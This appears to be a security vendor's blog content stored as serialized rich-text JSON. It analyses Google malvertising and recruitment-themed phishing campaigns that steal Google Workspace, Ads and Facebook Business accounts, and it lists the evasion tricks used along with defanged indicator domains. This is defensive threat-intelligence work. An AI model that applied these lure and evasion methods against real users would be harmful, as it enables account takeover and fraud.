",{"data":40894,"content":40895,"nodeType":178},{},[40896],{"data":40897,"marks":40898,"value":40899,"nodeType":173},{},[],"The employee had searched for “tradingview” on Google and been served a malicious ad impersonating the real site, which they had clicked. ",{"data":40901,"content":40902,"nodeType":178},{},[40903],{"data":40904,"marks":40905,"value":40906,"nodeType":173},{},[],"As well as being a highly convincing clone of the real site, this attack demonstrated a number of creative detection evasion techniques designed to prevent security tools, analysts, and web scraping bots from flagging it as malicious. ",{"data":40908,"content":40909,"nodeType":178},{},[40910],{"data":40911,"marks":40912,"value":40913,"nodeType":173},{},[],"You can see a narrated clickthrough of the end-to-end attack in the video below. ",{"data":40915,"content":40919,"nodeType":312},{"target":40916},{"sys":40917},{"id":40918,"type":317,"linkType":318},"V8NYoNBZBSZXSNBo2AfUZ",[],{"data":40921,"content":40922,"nodeType":231},{},[],{"data":40924,"content":40925,"nodeType":169},{},[40926],{"data":40927,"marks":40928,"value":14096,"nodeType":173},{},[40929],{"type":370},{"data":40931,"content":40932,"nodeType":178},{},[40933],{"data":40934,"marks":40935,"value":40936,"nodeType":173},{},[],"When the victim clicked the malicious ad, they were initially directed to tradingview-charts-compare.primevoro[.]com, but then immediately redirected to a second site. In effect, the victim would never see this initial page — it is simply used as a benign site that only forwards the victim on if certain parameters are supplied from the initial Google ad link. ",{"data":40938,"content":40942,"nodeType":312},{"target":40939},{"sys":40940},{"id":40941,"type":317,"linkType":318},"1v5dADDY2y9EAwCZ7ZnWVi",[],{"data":40944,"content":40945,"nodeType":178},{},[40946],{"data":40947,"marks":40948,"value":40949,"nodeType":173},{},[],"The first site that the victim would see is visually identical to the real TradingView site, at tradingplatforms[.]app. ",{"data":40951,"content":40955,"nodeType":312},{"target":40952},{"sys":40953},{"id":40954,"type":317,"linkType":318},"iHIbILX30HMnqM4NXx86G",[],{"data":40957,"content":40961,"nodeType":312},{"target":40958},{"sys":40959},{"id":40960,"type":317,"linkType":318},"2nK9Y4ZFejHtbWT2GcVNM1",[],{"data":40963,"content":40964,"nodeType":178},{},[40965],{"data":40966,"marks":40967,"value":40968,"nodeType":173},{},[],"Upon clicking the login button, they are taken to another convincingly designed page, where the victim is prompted to sign in with Google. ",{"data":40970,"content":40974,"nodeType":312},{"target":40971},{"sys":40972},{"id":40973,"type":317,"linkType":318},"6il7lhKUz5VIgQW9shl9oc",[],{"data":40976,"content":40977,"nodeType":178},{},[40978],{"data":40979,"marks":40980,"value":40981,"nodeType":173},{},[],"Upon clicking the sign in with Google button, the victim is finally taken to the reverse proxy Attacker-in-the-Middle phishing page targeting Google. If the victim logs in, their credentials and live session is stolen by the attacker. ",{"data":40983,"content":40987,"nodeType":312},{"target":40984},{"sys":40985},{"id":40986,"type":317,"linkType":318},"3LSrYN6X2qnBiMBoPi1Qse",[],{"data":40989,"content":40990,"nodeType":178},{},[40991],{"data":40992,"marks":40993,"value":40994,"nodeType":173},{},[],"You can see the timeline of URLs accessed in the chain captured in Push’s timeline feature, below. When we investigated, the phishing page had no user reports on urlscan. ",{"data":40996,"content":41000,"nodeType":312},{"target":40997},{"sys":40998},{"id":40999,"type":317,"linkType":318},"5spFXtWBhTtB4LO3cYHv8Z",[],{"data":41002,"content":41003,"nodeType":231},{},[],{"data":41005,"content":41006,"nodeType":169},{},[41007],{"data":41008,"marks":41009,"value":41011,"nodeType":173},{},[41010],{"type":370},"How did this attack evade standard detections?",{"data":41013,"content":41014,"nodeType":178},{},[41015,41019,41026],{"data":41016,"marks":41017,"value":41018,"nodeType":173},{},[],"It’s increasingly common for malicious sites to fly under the radar because of the effective use of ",{"data":41020,"content":41021,"nodeType":186},{"uri":6820},[41022],{"data":41023,"marks":41024,"value":8157,"nodeType":173},{},[41025],{"type":194},{"data":41027,"marks":41028,"value":41029,"nodeType":173},{},[],", designed to defeat traditional security tools and web-scraping security bots. ",{"data":41031,"content":41032,"nodeType":235},{},[41033],{"data":41034,"marks":41035,"value":41037,"nodeType":173},{},[41036],{"type":370},"Malvertising completely bypasses email-based controls",{"data":41039,"content":41040,"nodeType":178},{},[41041,41045,41052],{"data":41042,"marks":41043,"value":41044,"nodeType":173},{},[],"By delivering the lure via ",{"data":41046,"content":41047,"nodeType":186},{"uri":8043},[41048],{"data":41049,"marks":41050,"value":8046,"nodeType":173},{},[41051],{"type":194},{"data":41053,"marks":41054,"value":41055,"nodeType":173},{},[],", the attacker was able to completely bypass the most common phishing detection surface — email. ",{"data":41057,"content":41058,"nodeType":178},{},[41059,41063,41070],{"data":41060,"marks":41061,"value":41062,"nodeType":173},{},[],"Malvertising via channels like Google Search is an effective way to launch “watering hole” style attacks, casting a wide net to harvest credentials and account access that can be re-sold to other criminals for a fee, or leveraged by partners in the cybercriminal ecosystem as part of major cyber breaches (such as the recent attacks by the “",{"data":41064,"content":41065,"nodeType":186},{"uri":5002},[41066],{"data":41067,"marks":41068,"value":6811,"nodeType":173},{},[41069],{"type":194},{"data":41071,"marks":41072,"value":41073,"nodeType":173},{},[],"” criminal collective, all of which began with identity-based initial access). For this reason, credentials and account access are an increasingly profitable commodity for cyber criminals. ",{"data":41075,"content":41079,"nodeType":312},{"target":41076},{"sys":41077},{"id":41078,"type":317,"linkType":318},"7cq2IbGHIFH2UhkjIrwxGd",[],{"data":41081,"content":41082,"nodeType":235},{},[41083],{"data":41084,"marks":41085,"value":41087,"nodeType":173},{},[41086],{"type":370},"Conditional loading parameters prevented the site being flagged as known-bad",{"data":41089,"content":41090,"nodeType":178},{},[41091,41095,41102],{"data":41092,"marks":41093,"value":41094,"nodeType":173},{},[],"The attacker used clever ",{"data":41096,"content":41097,"nodeType":186},{"uri":7853},[41098],{"data":41099,"marks":41100,"value":7856,"nodeType":173},{},[41101],{"type":194},{"data":41103,"marks":41104,"value":41105,"nodeType":173},{},[]," techniques to prevent the page being accessed unless the correct steps were followed. This means that security analysts attempting to load one of the pages in isolation would either be served with a benign page, or be blocked from accessing the page in order to analyse it for malicious content.  ",{"data":41107,"content":41111,"nodeType":312},{"target":41108},{"sys":41109},{"id":41110,"type":317,"linkType":318},"2vjZTsrjuILnt5UjNx9Nce",[],{"data":41113,"content":41117,"nodeType":312},{"target":41114},{"sys":41115},{"id":41116,"type":317,"linkType":318},"3pOLIA4beNZ9tU87YLlhT0",[],{"data":41119,"content":41120,"nodeType":178},{},[41121],{"data":41122,"marks":41123,"value":41124,"nodeType":173},{},[],"Further, the attacker tightly scoped the initial malvertising lure to prevent unwanted visitors. Google Ads can be targeted to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). If you know where your target organization is located, you can tailor the ad to that location. ",{"data":41126,"content":41127,"nodeType":231},{},[],{"data":41129,"content":41130,"nodeType":169},{},[41131],{"data":41132,"marks":41133,"value":41135,"nodeType":173},{},[41134],{"type":370},"Further observations",{"data":41137,"content":41138,"nodeType":178},{},[41139,41142,41151],{"data":41140,"marks":41141,"value":37,"nodeType":173},{},[],{"data":41143,"content":41145,"nodeType":186},{"uri":41144},"https://www.bleepingcomputer.com/news/security/google-ads-for-fake-homebrew-logmein-sites-push-infostealers/",[41146],{"data":41147,"marks":41148,"value":41150,"nodeType":173},{},[41149],{"type":194},"According to security researchers",{"data":41152,"marks":41153,"value":41154,"nodeType":173},{},[],", attackers have been recently observed running ClickFix malvertising campaigns over Google Search that also impersonated TradingView. These attacks attempted to deliver malware to Mac users, harvesting sensitive information stored in the browser, cryptocurrency credentials, and exfiltrating to the command and control server.",{"data":41156,"content":41160,"nodeType":312},{"target":41157},{"sys":41158},{"id":41159,"type":317,"linkType":318},"VeLfUptGY8ygKHroPxTby",[],{"data":41162,"content":41163,"nodeType":178},{},[41164],{"data":41165,"marks":41166,"value":41167,"nodeType":173},{},[],"Attackers have been known to target investment and cryptocurrency accounts, particularly those aligned with North Korean state-sponsored operations. This is both targeting individual users as well as business accounts used in operating exchanges themselves, such as in the massive Bybit hack earlier this year. ",{"data":41169,"content":41170,"nodeType":231},{},[],{"data":41172,"content":41173,"nodeType":169},{},[41174],{"data":41175,"marks":41176,"value":8406,"nodeType":173},{},[41177],{"type":370},{"data":41179,"content":41180,"nodeType":178},{},[41181,41184,41191],{"data":41182,"marks":41183,"value":8414,"nodeType":173},{},[],{"data":41185,"content":41186,"nodeType":186},{"uri":8419},[41187],{"data":41188,"marks":41189,"value":8422,"nodeType":173},{},[41190],{"type":194},{"data":41192,"marks":41193,"value":8427,"nodeType":173},{},[],{"data":41195,"content":41196,"nodeType":178},{},[41197],{"data":41198,"marks":41199,"value":14399,"nodeType":173},{},[],{"data":41201,"content":41202,"nodeType":250},{},[41203,41213,41223],{"data":41204,"content":41205,"nodeType":254},{},[41206],{"data":41207,"content":41208,"nodeType":178},{},[41209],{"data":41210,"marks":41211,"value":41212,"nodeType":173},{},[],"hxxps://tradingview-charts-compare.primevoro.com",{"data":41214,"content":41215,"nodeType":254},{},[41216],{"data":41217,"content":41218,"nodeType":178},{},[41219],{"data":41220,"marks":41221,"value":41222,"nodeType":173},{},[],"hxxps://tradingplatforms.app",{"data":41224,"content":41225,"nodeType":254},{},[41226],{"data":41227,"content":41228,"nodeType":178},{},[41229],{"data":41230,"marks":41231,"value":41232,"nodeType":173},{},[],"hxxps://accounts.aeonnailspa.com",{"data":41234,"content":41235,"nodeType":231},{},[],{"data":41237,"content":41238,"nodeType":169},{},[41239],{"data":41240,"marks":41241,"value":8517,"nodeType":173},{},[41242],{"type":370},{"data":41244,"content":41245,"nodeType":178},{},[41246,41249,41256],{"data":41247,"marks":41248,"value":8538,"nodeType":173},{},[],{"data":41250,"content":41251,"nodeType":186},{"uri":6820},[41252],{"data":41253,"marks":41254,"value":8545,"nodeType":173},{},[41255],{"type":194},{"data":41257,"marks":41258,"value":8550,"nodeType":173},{},[],{"data":41260,"content":41261,"nodeType":178},{},[41262],{"data":41263,"marks":41264,"value":26673,"nodeType":173},{},[],{"data":41266,"content":41267,"nodeType":178},{},[41268,41271,41278,41281,41288],{"data":41269,"marks":41270,"value":1451,"nodeType":173},{},[],{"data":41272,"content":41273,"nodeType":186},{"uri":1456},[41274],{"data":41275,"marks":41276,"value":1459,"nodeType":173},{},[41277],{"type":194},{"data":41279,"marks":41280,"value":1464,"nodeType":173},{},[],{"data":41282,"content":41283,"nodeType":186},{"uri":1469},[41284],{"data":41285,"marks":41286,"value":1472,"nodeType":173},{},[41287],{"type":194},{"data":41289,"marks":41290,"value":1477,"nodeType":173},{},[],{"data":41292,"content":41295,"nodeType":312},{"target":41293},{"sys":41294},{"id":8590,"type":317,"linkType":318},[],{"data":41297,"content":41298,"nodeType":178},{},[41299],{"data":41300,"marks":41301,"value":37,"nodeType":173},{},[],"Analysing a sophisticated Google malvertising attack impersonating TradingView","Push recently detected and blocked a malvertising attack impersonating TradingView designed to hijack Google Workspace accounts.","2025-12-08T00:00:00.000Z","analysing-a-sophisticated-google-malvertising-attack",{"items":41307},[41308,41310],{"sys":41309,"name":505},{"id":504},{"sys":41311,"name":509},{"id":508},{"items":41313},[41314],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":41315},{"url":1496},{"__typename":1528,"sys":41317,"content":41318,"title":41689,"synopsis":41690,"hashTags":118,"publishedDate":41691,"slug":41692,"tagsCollection":41693,"authorsCollection":41699},{"id":24155},{"json":41319},{"data":41320,"content":41321,"nodeType":165},{},[41322,41329,41336,41342,41349,41382,41389,41395,41402,41408,41414,41420,41426,41432,41435,41443,41450,41457,41464,41472,41478,41496,41503,41520,41525,41528,41535,41542,41615,41622,41625,41632,41639,41646,41652,41678,41683],{"data":41323,"content":41324,"nodeType":169},{},[41325],{"data":41326,"marks":41327,"value":14096,"nodeType":173},{},[41328],{"type":370},{"data":41330,"content":41331,"nodeType":178},{},[41332],{"data":41333,"marks":41334,"value":41335,"nodeType":173},{},[],"We recently detected and blocked a malvertising attack impacting one of our customer’s employees. The employee had searched for “Google ads” in Google Search to log into their Google Ads Manager account.  ",{"data":41337,"content":41341,"nodeType":312},{"target":41338},{"sys":41339},{"id":41340,"type":317,"linkType":318},"40RyyKZC0R07wLU1OZBmH",[],{"data":41343,"content":41344,"nodeType":178},{},[41345],{"data":41346,"marks":41347,"value":41348,"nodeType":173},{},[],"The user:",{"data":41350,"content":41351,"nodeType":250},{},[41352,41362,41372],{"data":41353,"content":41354,"nodeType":254},{},[41355],{"data":41356,"content":41357,"nodeType":178},{},[41358],{"data":41359,"marks":41360,"value":41361,"nodeType":173},{},[],"Searched for “Google ads” in Google Search",{"data":41363,"content":41364,"nodeType":254},{},[41365],{"data":41366,"content":41367,"nodeType":178},{},[41368],{"data":41369,"marks":41370,"value":41371,"nodeType":173},{},[],"Click the ad for hxxps://ads-adsword1.odoo.com/…",{"data":41373,"content":41374,"nodeType":254},{},[41375],{"data":41376,"content":41377,"nodeType":178},{},[41378],{"data":41379,"marks":41380,"value":41381,"nodeType":173},{},[],"Was redirected to hxxps://sing-operador2.click/accounts/v3/login/ where the phishing form was blocked. ",{"data":41383,"content":41384,"nodeType":178},{},[41385],{"data":41386,"marks":41387,"value":41388,"nodeType":173},{},[],"When we came to investigate this detection further, we found that the site had already been taken down.  ",{"data":41390,"content":41394,"nodeType":312},{"target":41391},{"sys":41392},{"id":41393,"type":317,"linkType":318},"6eAIVxgaEDQ9krKZvu8zyI",[],{"data":41396,"content":41397,"nodeType":178},{},[41398],{"data":41399,"marks":41400,"value":41401,"nodeType":173},{},[],"However, we were able to replicate the user’s activity to find other examples that show clear signs of being linked to the same campaign — both hosted on Odoo, with one also using Kartra as a redirect.",{"data":41403,"content":41407,"nodeType":312},{"target":41404},{"sys":41405},{"id":41406,"type":317,"linkType":318},"1wGu0slZcKBNIUhuNk5SZN",[],{"data":41409,"content":41413,"nodeType":312},{"target":41410},{"sys":41411},{"id":41412,"type":317,"linkType":318},"5SqaaD4vDzvdkzVX8ypxvB",[],{"data":41415,"content":41419,"nodeType":312},{"target":41416},{"sys":41417},{"id":41418,"type":317,"linkType":318},"7IT185wut2jTtQy1lC9F5t",[],{"data":41421,"content":41425,"nodeType":312},{"target":41422},{"sys":41423},{"id":41424,"type":317,"linkType":318},"78WkGo9ZTio1fYvfP7W68",[],{"data":41427,"content":41431,"nodeType":312},{"target":41428},{"sys":41429},{"id":41430,"type":317,"linkType":318},"5CWMR1gxq3Uao4HGGhRLKE",[],{"data":41433,"content":41434,"nodeType":231},{},[],{"data":41436,"content":41437,"nodeType":169},{},[41438],{"data":41439,"marks":41440,"value":41442,"nodeType":173},{},[41441],{"type":370},"Why malvertising & Google ads?",{"data":41444,"content":41445,"nodeType":178},{},[41446],{"data":41447,"marks":41448,"value":41449,"nodeType":173},{},[],"Malvertising attacks delivered over channels like Google Search are a great way to catch victims unawares while also evading typically email-based anti-phishing controls. ",{"data":41451,"content":41452,"nodeType":178},{},[41453],{"data":41454,"marks":41455,"value":41456,"nodeType":173},{},[],"The flipside of this is that malvertising attacks are less likely to be targeted than phishing delivered directly to the victim via a direct message (i.e. email, social media DM, instant messenger app, SMS, etc.). This appears to be true in this case: we were served the ad from a UK location despite the initial ad targeting an EU-based company. ",{"data":41458,"content":41459,"nodeType":178},{},[41460],{"data":41461,"marks":41462,"value":41463,"nodeType":173},{},[],"However, that isn’t to say that malvertising attacks can’t be targeted. For example, Google Ads can be targeted to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). If you know where your target organization is located, you can tailor the ad to that location. Even more precise ad targeting can be achieved on social media platforms. ",{"data":41465,"content":41466,"nodeType":178},{},[41467],{"data":41468,"marks":41469,"value":41471,"nodeType":173},{},[41470],{"type":370},"In this case, it appears that the attacker was specifically targeting Google Ad Manager accounts. ",{"data":41473,"content":41477,"nodeType":312},{"target":41474},{"sys":41475},{"id":41476,"type":317,"linkType":318},"5JA7xWPghOBln49SfkvefW",[],{"data":41479,"content":41480,"nodeType":178},{},[41481,41485,41492],{"data":41482,"marks":41483,"value":41484,"nodeType":173},{},[],"With malvertising on the rise as an increasingly popular attack vector for the delivery of AITM phishing, malware downloads, and ",{"data":41486,"content":41487,"nodeType":186},{"uri":1842},[41488],{"data":41489,"marks":41490,"value":1845,"nodeType":173},{},[41491],{"type":194},{"data":41493,"marks":41494,"value":41495,"nodeType":173},{},[]," (4 in 5 ClickFix attacks intercepted by Push were delivered via Google Search), it makes sense that attackers are looking to increase their web of accounts from which to launch malicious ads. ",{"data":41497,"content":41498,"nodeType":178},{},[41499],{"data":41500,"marks":41501,"value":41502,"nodeType":173},{},[],"Particularly for organizations that are running large numbers of ads with pre-allocated budget/cards for their ad account, or organizations performing ad management/marketing services on behalf of other organizations, it’s easy to see how attackers can take over these accounts and spin up malicious ads. ",{"data":41504,"content":41505,"nodeType":178},{},[41506,41510,41517],{"data":41507,"marks":41508,"value":41509,"nodeType":173},{},[],"Malvertising via Google Search is an effective way to launch “watering hole” style attacks, casting a wide net to harvest credentials and account access that can be re-sold to other criminals for a fee, or leveraged by partners in the cybercriminal ecosystem as part of major cyber breaches (such as the recent attacks by the “",{"data":41511,"content":41512,"nodeType":186},{"uri":5002},[41513],{"data":41514,"marks":41515,"value":6811,"nodeType":173},{},[41516],{"type":194},{"data":41518,"marks":41519,"value":41073,"nodeType":173},{},[],{"data":41521,"content":41524,"nodeType":312},{"target":41522},{"sys":41523},{"id":8590,"type":317,"linkType":318},[],{"data":41526,"content":41527,"nodeType":231},{},[],{"data":41529,"content":41530,"nodeType":169},{},[41531],{"data":41532,"marks":41533,"value":8406,"nodeType":173},{},[41534],{"type":370},{"data":41536,"content":41537,"nodeType":178},{},[41538],{"data":41539,"marks":41540,"value":41541,"nodeType":173},{},[],"The following domains were involved in the attacks:",{"data":41543,"content":41544,"nodeType":250},{},[41545,41555,41565,41575,41585,41595,41605],{"data":41546,"content":41547,"nodeType":254},{},[41548],{"data":41549,"content":41550,"nodeType":178},{},[41551],{"data":41552,"marks":41553,"value":41554,"nodeType":173},{},[],"hxxps://ads-adsword1.odoo.com",{"data":41556,"content":41557,"nodeType":254},{},[41558],{"data":41559,"content":41560,"nodeType":178},{},[41561],{"data":41562,"marks":41563,"value":41564,"nodeType":173},{},[],"hxxps://sing-operador2.click/accounts/v3/login",{"data":41566,"content":41567,"nodeType":254},{},[41568],{"data":41569,"content":41570,"nodeType":178},{},[41571],{"data":41572,"marks":41573,"value":41574,"nodeType":173},{},[],"hxxps://adsgooglie.odoo.com/",{"data":41576,"content":41577,"nodeType":254},{},[41578],{"data":41579,"content":41580,"nodeType":178},{},[41581],{"data":41582,"marks":41583,"value":41584,"nodeType":173},{},[],"hxxps://word4only.online/",{"data":41586,"content":41587,"nodeType":254},{},[41588],{"data":41589,"content":41590,"nodeType":178},{},[41591],{"data":41592,"marks":41593,"value":41594,"nodeType":173},{},[],"hxxps://adsloginacess.kartra.com/page/oeN7",{"data":41596,"content":41597,"nodeType":254},{},[41598],{"data":41599,"content":41600,"nodeType":178},{},[41601],{"data":41602,"marks":41603,"value":41604,"nodeType":173},{},[],"hxxps://ads-o.odoo.com",{"data":41606,"content":41607,"nodeType":254},{},[41608],{"data":41609,"content":41610,"nodeType":178},{},[41611],{"data":41612,"marks":41613,"value":41614,"nodeType":173},{},[],"hxxps://operador8-ads.lat/accounts/v3/login/",{"data":41616,"content":41617,"nodeType":178},{},[41618],{"data":41619,"marks":41620,"value":41621,"nodeType":173},{},[],"However, with the rate at which these domains were spun up and subsequently taken down (by the attacker or the site hosting the links) IoC-based detections for campaigns such as this are of limited value. ",{"data":41623,"content":41624,"nodeType":231},{},[],{"data":41626,"content":41627,"nodeType":169},{},[41628],{"data":41629,"marks":41630,"value":8517,"nodeType":173},{},[41631],{"type":370},{"data":41633,"content":41634,"nodeType":178},{},[41635],{"data":41636,"marks":41637,"value":41638,"nodeType":173},{},[],"Regardless of the delivery channel, all roads lead to a web page accessed in the victim’s browser — where Push is waiting to detect and block the attack. ",{"data":41640,"content":41641,"nodeType":178},{},[41642],{"data":41643,"marks":41644,"value":41645,"nodeType":173},{},[],"By seeing what your users see, and getting an unfiltered, real-time view of the page as it loads, Push is able to pinpoint malicious content, code, and behaviors and shut the attack down before it happens. Whether it's entering credentials onto a phishing page, approving a malicious OAuth grant, installing a risky browser extension, or insecurely accessing an app with a weak password and no MFA, Push detects the action and responds in real-time.",{"data":41647,"content":41648,"nodeType":178},{},[41649],{"data":41650,"marks":41651,"value":14340,"nodeType":173},{},[],{"data":41653,"content":41654,"nodeType":178},{},[41655,41658,41665,41668,41675],{"data":41656,"marks":41657,"value":1451,"nodeType":173},{},[],{"data":41659,"content":41660,"nodeType":186},{"uri":1456},[41661],{"data":41662,"marks":41663,"value":1459,"nodeType":173},{},[41664],{"type":194},{"data":41666,"marks":41667,"value":1464,"nodeType":173},{},[],{"data":41669,"content":41670,"nodeType":186},{"uri":1469},[41671],{"data":41672,"marks":41673,"value":1472,"nodeType":173},{},[41674],{"type":194},{"data":41676,"marks":41677,"value":1477,"nodeType":173},{},[],{"data":41679,"content":41682,"nodeType":312},{"target":41680},{"sys":41681},{"id":8590,"type":317,"linkType":318},[],{"data":41684,"content":41685,"nodeType":178},{},[41686],{"data":41687,"marks":41688,"value":37,"nodeType":173},{},[],"Analysing a malvertising attack targeting business Google accounts intercepted by Push","Analysing a malvertising attack targeting Google business accounts that was intercepted by Push. ","2025-12-02T00:00:00.000Z","analysing-a-malvertising-attack-targeting-business-google-accounts",{"items":41694},[41695,41697],{"sys":41696,"name":509},{"id":508},{"sys":41698,"name":505},{"id":504},{"items":41700},[41701],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":41702},{"url":1496},{"__typename":1528,"sys":41704,"content":41706,"title":42282,"synopsis":42283,"hashTags":118,"publishedDate":41691,"slug":42284,"tagsCollection":42285,"authorsCollection":42291},{"id":41705},"6Zosy4SU0LpjlaSWX75peb",{"json":41707},{"data":41708,"content":41709,"nodeType":165},{},[41710,41717,41724,41731,41737,41744,41747,41755,41762,41769,41776,41782,41789,41795,41802,41808,41815,41821,41851,41858,41864,41871,41877,41884,41890,41897,41940,41943,41951,41958,41965,41972,41978,41981,41989,41996,42016,42022,42028,42034,42041,42047,42053,42073,42076,42084,42103,42109,42116,42132,42140,42147,42154,42160,42178,42186,42193,42199,42202,42209,42216,42222,42225,42232,42239,42245,42271,42276],{"data":41711,"content":41712,"nodeType":178},{},[41713],{"data":41714,"marks":41715,"value":41716,"nodeType":173},{},[],"We recently investigated a sophisticated phishing campaign targeting Google Workspace and Facebook Business accounts with Calendly-themed phishing lures, based around a fake job opportunity. ",{"data":41718,"content":41719,"nodeType":178},{},[41720],{"data":41721,"marks":41722,"value":41723,"nodeType":173},{},[],"We were first alerted to the campaign when a Push customer was hit with a highly targeted email-based attack, where the attacker used an Attacker-in-the-Middle (AiTM) phishing toolkit to target the customer’s Google Workspace account. ",{"data":41725,"content":41726,"nodeType":178},{},[41727],{"data":41728,"marks":41729,"value":41730,"nodeType":173},{},[],"In this case, Google was the customer’s primary enterprise IdP account, used to access native Google suite apps as well as SSO to downstream apps — effectively, the front door to their business IT stack. Despite this, the attacker’s MO was specifically the takeover of accounts used for the management of digital ads. ",{"data":41732,"content":41736,"nodeType":312},{"target":41733},{"sys":41734},{"id":41735,"type":317,"linkType":318},"5oivBCf1Fqvnq0GNCSko8f",[],{"data":41738,"content":41739,"nodeType":178},{},[41740],{"data":41741,"marks":41742,"value":41743,"nodeType":173},{},[],"In this blog post, we break down the various TTPs used by the attacker across the campaign, and consider why ad management platforms are being specifically targeted.  ",{"data":41745,"content":41746,"nodeType":231},{},[],{"data":41748,"content":41749,"nodeType":169},{},[41750],{"data":41751,"marks":41752,"value":41754,"nodeType":173},{},[41753],{"type":370},"Variant 1: Targeting Google Workspace with a sophisticated email phish ",{"data":41756,"content":41757,"nodeType":178},{},[41758],{"data":41759,"marks":41760,"value":41761,"nodeType":173},{},[],"The first phishing variant we analyzed began with a multi-stage phishing email lure, framed as a job opportunity for LVMH (Louis Vuitton Moët Hennessy), which oversees more than 75 brands across sectors like fashion, cosmetics, watches, and spirits. The specific delivery address is impersonating “Inside LVMH”, the talent acquisition and training arm of LVMH.  ",{"data":41763,"content":41764,"nodeType":178},{},[41765],{"data":41766,"marks":41767,"value":41768,"nodeType":173},{},[],"This lure is notable for multiple reasons. It is highly targeted, well-written, populated with information from the victim, and coming from what appears to be a legitimate employee of LVMH. Even if the victim was initially suspicious, searching for the recruiter’s name would appear to confirm their identity.  ",{"data":41770,"content":41771,"nodeType":178},{},[41772],{"data":41773,"marks":41774,"value":41775,"nodeType":173},{},[],"It is possible, even likely, that this interaction was operated using AI, using information scraped from the internet — but in any case, the outcome achieved is highly convincing. ",{"data":41777,"content":41781,"nodeType":312},{"target":41778},{"sys":41779},{"id":41780,"type":317,"linkType":318},"46BYpquURERbkhWc6C2Lpc",[],{"data":41783,"content":41784,"nodeType":178},{},[41785],{"data":41786,"marks":41787,"value":41788,"nodeType":173},{},[],"Only after the victim has responded to an initial email was the phishing link delivered under the guise of a Calendly link to book time for a call. ",{"data":41790,"content":41794,"nodeType":312},{"target":41791},{"sys":41792},{"id":41793,"type":317,"linkType":318},"37GBkfXGEdWvdQbMq65sad",[],{"data":41796,"content":41797,"nodeType":178},{},[41798],{"data":41799,"marks":41800,"value":41801,"nodeType":173},{},[],"Clicking the link takes the victim to an authentic-looking page impersonating a Calendly landing page.",{"data":41803,"content":41807,"nodeType":312},{"target":41804},{"sys":41805},{"id":41806,"type":317,"linkType":318},"1DwOPzK7mxsoJlEBp8cMpr",[],{"data":41809,"content":41810,"nodeType":178},{},[41811],{"data":41812,"marks":41813,"value":41814,"nodeType":173},{},[],"After completing the CAPTCHA check and selecting \"Continue with Google” the victim is redirected to an AiTM phishing page designed to capture Google Workspace credentials, with specific branding impersonating Calendly — making this visually distinct from most common Google-themed phishing pages. ",{"data":41816,"content":41820,"nodeType":312},{"target":41817},{"sys":41818},{"id":41819,"type":317,"linkType":318},"u1SY1uUX23sxfBYLpyaKb",[],{"data":41822,"content":41823,"nodeType":178},{},[41824,41828,41836,41840,41847],{"data":41825,"marks":41826,"value":41827,"nodeType":173},{},[],"This page uses ",{"data":41829,"content":41830,"nodeType":186},{"uri":7853},[41831],{"data":41832,"marks":41833,"value":41835,"nodeType":173},{},[41834],{"type":194},"specific targeting parameters",{"data":41837,"marks":41838,"value":41839,"nodeType":173},{},[]," to ensure that only the intended recipient is able to access the page’s malicious functionality — a well-known ",{"data":41841,"content":41842,"nodeType":186},{"uri":6820},[41843],{"data":41844,"marks":41845,"value":13298,"nodeType":173},{},[41846],{"type":194},{"data":41848,"marks":41849,"value":41850,"nodeType":173},{},[]," to prevent security analysts from being able to fully analyse the page (as malicious elements are not rendered until this check is completed). ",{"data":41852,"content":41853,"nodeType":178},{},[41854],{"data":41855,"marks":41856,"value":41857,"nodeType":173},{},[],"As you can see in the example below, attempts to use any email other than the intended victim’s email domain are blocked.   ",{"data":41859,"content":41863,"nodeType":312},{"target":41860},{"sys":41861},{"id":41862,"type":317,"linkType":318},"5m8LvVYjXz0zrITgTWqxio",[],{"data":41865,"content":41866,"nodeType":178},{},[41867],{"data":41868,"marks":41869,"value":41870,"nodeType":173},{},[],"Only entering an allowed email domain loads the password entry field. ",{"data":41872,"content":41876,"nodeType":312},{"target":41873},{"sys":41874},{"id":41875,"type":317,"linkType":318},"6KFRJSsgk2pB6x67kWdpws",[],{"data":41878,"content":41879,"nodeType":178},{},[41880],{"data":41881,"marks":41882,"value":41883,"nodeType":173},{},[],"We identified a number of pages that appear to be part of the same campaign. All these pages have the same visual style, Calendly-themed lure targeting Google Workspace accounts, and appear to match real employees of the respective companies being impersonated. ",{"data":41885,"content":41889,"nodeType":312},{"target":41886},{"sys":41887},{"id":41888,"type":317,"linkType":318},"zMkN1U5QlvIEcfOGmhBBf",[],{"data":41891,"content":41892,"nodeType":178},{},[41893],{"data":41894,"marks":41895,"value":41896,"nodeType":173},{},[],"The different pages include:",{"data":41898,"content":41899,"nodeType":250},{},[41900,41910,41920,41930],{"data":41901,"content":41902,"nodeType":254},{},[41903],{"data":41904,"content":41905,"nodeType":178},{},[41906],{"data":41907,"marks":41908,"value":41909,"nodeType":173},{},[],"A different visual match for the LVMH page.",{"data":41911,"content":41912,"nodeType":254},{},[41913],{"data":41914,"content":41915,"nodeType":178},{},[41916],{"data":41917,"marks":41918,"value":41919,"nodeType":173},{},[],"A Lego recruitment themed page.",{"data":41921,"content":41922,"nodeType":254},{},[41923],{"data":41924,"content":41925,"nodeType":178},{},[41926],{"data":41927,"marks":41928,"value":41929,"nodeType":173},{},[],"A Mastercard HR themed page.",{"data":41931,"content":41932,"nodeType":254},{},[41933],{"data":41934,"content":41935,"nodeType":178},{},[41936],{"data":41937,"marks":41938,"value":41939,"nodeType":173},{},[],"An Uber recruitment themed page.",{"data":41941,"content":41942,"nodeType":231},{},[],{"data":41944,"content":41945,"nodeType":169},{},[41946],{"data":41947,"marks":41948,"value":41950,"nodeType":173},{},[41949],{"type":370},"Variant 2: Targeting Facebook Business accounts",{"data":41952,"content":41953,"nodeType":178},{},[41954],{"data":41955,"marks":41956,"value":41957,"nodeType":173},{},[],"Upon further investigation, we found links to a second phishing page style that appears to be part of a longer campaign targeting Facebook accounts, dating back more than two years. ",{"data":41959,"content":41960,"nodeType":178},{},[41961],{"data":41962,"marks":41963,"value":41964,"nodeType":173},{},[],"In total, we identified 31 unique URLs associated with the same campaign, many of which were recycled over time to impersonate different brands. ",{"data":41966,"content":41967,"nodeType":178},{},[41968],{"data":41969,"marks":41970,"value":41971,"nodeType":173},{},[],"Since most of these pages appeared to be older (and no longer live) they could not be analysed further, beyond giving an indication of how the phishing campaign has evolved over time. 